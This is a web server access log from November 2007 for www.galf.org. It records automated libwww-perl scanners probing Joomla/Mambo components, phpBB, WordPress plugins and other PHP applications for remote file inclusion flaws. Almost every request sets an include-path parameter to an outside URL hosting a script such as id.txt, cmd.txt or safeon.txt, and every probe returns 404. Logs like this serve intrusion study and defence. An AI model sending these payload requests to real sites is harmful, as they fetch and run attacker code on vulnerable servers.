66.118.142.56 - - [04/Nov/2007:16:52:24 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://darka.hostinggratisargentina.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:16:53:03 -0800] "GET /logs/access_071008.log/administrator/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.13.65.33 - - [04/Nov/2007:16:53:08 -0800] "GET /administrator/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.152.1.228 - - [04/Nov/2007:16:55:20 -0800] "GET /logs/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.189.224.2 - - [04/Nov/2007:16:55:21 -0800] "GET /administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.44.46.199 - - [04/Nov/2007:16:57:47 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
202.44.46.199 - - [04/Nov/2007:16:57:48 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.209.158.171 - - [04/Nov/2007:16:57:56 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.ownsyou.kit.net/vvvvv/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
85.13.65.33 - - [04/Nov/2007:16:58:20 -0800] "GET /logs/access_070903.log//administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:16:58:26 -0800] "GET /logs//administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.13.65.33 - - [04/Nov/2007:16:59:47 -0800] "GET /logs/access_070827.log//administrator/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:16:59:52 -0800] "GET //administrator/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.53.32.12 - - [04/Nov/2007:17:00:07 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.183.177 - - [04/Nov/2007:17:00:12 -0800] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hendersonhideaway.net/TNG/photos/errors? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.183.177 - - [04/Nov/2007:17:00:12 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hendersonhideaway.net/TNG/photos/errors? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.183.177 - - [04/Nov/2007:17:00:13 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hendersonhideaway.net/TNG/photos/errors? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.9.146.30 - - [04/Nov/2007:17:00:25 -0800] "GET /logs/access_070723.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.flylink.psi.br/arquivos/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.9.146.30 - - [04/Nov/2007:17:00:25 -0800] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.flylink.psi.br/arquivos/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.146.30 - - [04/Nov/2007:17:00:25 -0800] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.flylink.psi.br/arquivos/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.58.183.177 - - [04/Nov/2007:17:00:32 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hendersonhideaway.net/TNG/photos/errors? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.183.177 - - [04/Nov/2007:17:00:46 -0800] "GET /logs/access_071022.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hendersonhideaway.net/TNG/photos/errors? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.44.46.199 - - [04/Nov/2007:17:02:11 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
202.44.46.199 - - [04/Nov/2007:17:02:11 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.255.113.219 - - [04/Nov/2007:17:02:29 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cms.alm.cc/contenido/cronjobs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.255.113.219 - - [04/Nov/2007:17:02:30 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cms.alm.cc/contenido/cronjobs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
141.155.23.241 - - [04/Nov/2007:17:02:52 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.galf.org"
141.155.23.241 - - [04/Nov/2007:17:02:53 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.galf.org"
207.58.183.177 - - [04/Nov/2007:17:02:59 -0800] "GET /logs/access_071001.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hendersonhideaway.net/TNG/photos/errors? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.58.183.177 - - [04/Nov/2007:17:03:09 -0800] "GET /logs/access_070917.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hendersonhideaway.net/TNG/photos/errors? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.58.183.177 - - [04/Nov/2007:17:03:09 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hendersonhideaway.net/TNG/photos/errors? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.183.177 - - [04/Nov/2007:17:03:09 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hendersonhideaway.net/TNG/photos/errors? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.183.177 - - [04/Nov/2007:17:03:14 -0800] "GET /logs/access_070827.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hendersonhideaway.net/TNG/photos/errors? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:17:04:10 -0800] "GET /logs/access_071001.log/administrator/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.111.50 - - [04/Nov/2007:17:05:11 -0800] "GET /logs/access_070716.log/index.php?go=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.19.111.50 - - [04/Nov/2007:17:05:11 -0800] "GET /index.php?go=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.19.111.50 - - [04/Nov/2007:17:05:11 -0800] "GET /logs/index.php?go=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
87.117.199.78 - - [04/Nov/2007:17:05:14 -0800] "GET /logs/access_070910.log//modules/agendax/addevent.inc.php?agendax_path=http://www.lasexta.net/components/rm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.199.78 - - [04/Nov/2007:17:05:14 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.lasexta.net/components/rm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.199.78 - - [04/Nov/2007:17:05:15 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.lasexta.net/components/rm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.199.78 - - [04/Nov/2007:17:05:16 -0800] "GET /logs/access_070910.log//modules/agendax/addevent.inc.php?agendax_path=http://www.lasexta.net/components/rm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.199.78 - - [04/Nov/2007:17:05:16 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.lasexta.net/components/rm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.199.78 - - [04/Nov/2007:17:05:17 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.lasexta.net/components/rm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.199.78 - - [04/Nov/2007:17:05:18 -0800] "GET /logs/access_071008.log//modules/agendax/addevent.inc.php?agendax_path=http://www.lasexta.net/components/rm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.199.78 - - [04/Nov/2007:17:05:18 -0800] "GET /logs/access_071008.log//modules/agendax/addevent.inc.php?agendax_path=http://www.lasexta.net/components/rm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.111.50 - - [04/Nov/2007:17:05:24 -0800] "GET /logs/access_070723.log/index.php?go=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.70.110.195 - - [04/Nov/2007:17:06:26 -0800] "GET /logs/access_070625.log/index.php?page=http://www.uwmail.eu/led/dev/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.70.110.195 - - [04/Nov/2007:17:06:26 -0800] "GET /index.php?page=http://www.uwmail.eu/led/dev/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.70.110.195 - - [04/Nov/2007:17:06:27 -0800] "GET /logs/index.php?page=http://www.uwmail.eu/led/dev/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.70.110.195 - - [04/Nov/2007:17:06:35 -0800] "GET /logs/access_070917.log/index.php?page=http://www.uwmail.eu/led/dev/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.77.178 - - [04/Nov/2007:17:06:44 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_pathhttp://indiablo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.77.178 - - [04/Nov/2007:17:06:44 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_pathhttp://indiablo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
67.19.111.50 - - [04/Nov/2007:17:07:48 -0800] "GET /logs/access_070826.log/index.php?go=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.19.111.50 - - [04/Nov/2007:17:07:48 -0800] "GET /index.php?go=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.19.111.50 - - [04/Nov/2007:17:07:49 -0800] "GET /logs/index.php?go=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.246.15.59 - - [04/Nov/2007:17:08:12 -0800] "GET /logs/access_070826.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=www.geocities.com/jagoanstarone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.246.15.59 - - [04/Nov/2007:17:08:12 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=www.geocities.com/jagoanstarone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.246.15.59 - - [04/Nov/2007:17:08:12 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=www.geocities.com/jagoanstarone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.199.78 - - [04/Nov/2007:17:08:12 -0800] "GET /logs/access_070826.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.smpn1-blitar.com/album/boy.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
87.117.199.78 - - [04/Nov/2007:17:08:13 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.smpn1-blitar.com/album/boy.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
87.117.199.78 - - [04/Nov/2007:17:08:13 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.smpn1-blitar.com/album/boy.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:17:08:34 -0800] "GET /administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:17:08:41 -0800] "GET /logs/administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.183.177 - - [04/Nov/2007:17:08:57 -0800] "GET /logs/access_071014.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.mymemorystick.com/includes/webdav/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.183.177 - - [04/Nov/2007:17:08:57 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.mymemorystick.com/includes/webdav/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.183.177 - - [04/Nov/2007:17:08:57 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.mymemorystick.com/includes/webdav/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.58.183.177 - - [04/Nov/2007:17:09:34 -0800] "GET /logs/access_070924.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hendersonhideaway.net/TNG/photos/errors? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.216.236.100 - - [04/Nov/2007:17:09:40 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.smpn1-blitar.com/album/boy.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
201.216.236.100 - - [04/Nov/2007:17:09:41 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.smpn1-blitar.com/album/boy.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.58.183.177 - - [04/Nov/2007:17:09:41 -0800] "GET /logs/access_070826.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hendersonhideaway.net/TNG/photos/errors? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.111.50 - - [04/Nov/2007:17:09:46 -0800] "GET /logs/access_070820.log/index.php?go=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.246.15.59 - - [04/Nov/2007:17:10:16 -0800] "GET /logs/access_071001.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=www.geocities.com/jagoanstarone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.246.15.59 - - [04/Nov/2007:17:10:16 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=www.geocities.com/jagoanstarone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.246.15.59 - - [04/Nov/2007:17:10:17 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=www.geocities.com/jagoanstarone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:17:10:29 -0800] "GET /logs//administrator/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:17:10:34 -0800] "GET //administrator/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
207.58.183.177 - - [04/Nov/2007:17:10:38 -0800] "GET /logs/access_071008.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hendersonhideaway.net/TNG/photos/errors? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.58.183.177 - - [04/Nov/2007:17:10:39 -0800] "GET /logs/access_070903.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hendersonhideaway.net/TNG/photos/errors? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.146.30 - - [04/Nov/2007:17:11:05 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.flylink.psi.br/arquivos/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.146.30 - - [04/Nov/2007:17:11:05 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.flylink.psi.br/arquivos/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:17:11:08 -0800] "GET /logs/access_070917.log/administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.1.206.212 - - [04/Nov/2007:17:11:30 -0800] "GET /logs/access_070618.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.1.206.212 - - [04/Nov/2007:17:11:30 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.1.206.212 - - [04/Nov/2007:17:11:31 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.117.199.78 - - [04/Nov/2007:17:11:51 -0800] "GET /logs/access_070813.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.smpn1-blitar.com/album/boy.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.183.177 - - [04/Nov/2007:17:12:21 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hendersonhideaway.net/TNG/photos/errors? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
62.1.206.212 - - [04/Nov/2007:17:12:50 -0800] "GET /logs/access_070702.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
208.98.1.245 - - [04/Nov/2007:17:14:14 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://miniradio.no/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
208.98.1.245 - - [04/Nov/2007:17:14:15 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://miniradio.no/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.30.160.11 - - [04/Nov/2007:17:15:22 -0800] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://puterselect.com/modules/Neos_Chronos/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
194.30.160.11 - - [04/Nov/2007:17:15:22 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://puterselect.com/modules/Neos_Chronos/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
194.30.160.11 - - [04/Nov/2007:17:15:23 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://puterselect.com/modules/Neos_Chronos/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
194.30.160.11 - - [04/Nov/2007:17:15:23 -0800] "GET /logs/access_070820.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://puterselect.com/modules/Neos_Chronos/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
85.190.1.12 - - [04/Nov/2007:17:15:43 -0800] "GET /logs/access_071001.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=www.geocities.com/jagoanstarone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.190.1.12 - - [04/Nov/2007:17:15:43 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=www.geocities.com/jagoanstarone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.190.1.12 - - [04/Nov/2007:17:15:43 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=www.geocities.com/jagoanstarone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
208.98.1.245 - - [04/Nov/2007:17:16:06 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://miniradio.no/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.98.1.245 - - [04/Nov/2007:17:16:06 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://miniradio.no/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.98.1.245 - - [04/Nov/2007:17:16:38 -0800] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://miniradio.no/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.112.214.40 - - [04/Nov/2007:17:16:52 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.112.214.40 - - [04/Nov/2007:17:16:52 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.112.214.40 - - [04/Nov/2007:17:16:53 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.112.214.40 - - [04/Nov/2007:17:16:53 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.234.130.178 - - [04/Nov/2007:17:16:56 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.130.178 - - [04/Nov/2007:17:16:56 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.130.178 - - [04/Nov/2007:17:16:56 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.130.178 - - [04/Nov/2007:17:16:56 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.98.1.245 - - [04/Nov/2007:17:17:01 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://miniradio.no/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.90.50 - - [04/Nov/2007:17:17:02 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
67.15.90.50 - - [04/Nov/2007:17:17:02 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.90.50 - - [04/Nov/2007:17:17:02 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.90.50 - - [04/Nov/2007:17:17:03 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.30.186 - - [04/Nov/2007:17:17:13 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/newila/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.38.30.186 - - [04/Nov/2007:17:17:13 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/newila/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.38.30.186 - - [04/Nov/2007:17:17:14 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/newila/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.117.199.78 - - [04/Nov/2007:17:17:23 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.smpn1-blitar.com/album/boy.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.199.78 - - [04/Nov/2007:17:17:23 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.smpn1-blitar.com/album/boy.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.98.1.245 - - [04/Nov/2007:17:17:26 -0800] "GET /logs/access_071022.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://miniradio.no/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.112.214.40 - - [04/Nov/2007:17:17:52 -0800] "GET /logs/access_070730.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.112.214.40 - - [04/Nov/2007:17:17:52 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.112.214.40 - - [04/Nov/2007:17:17:52 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
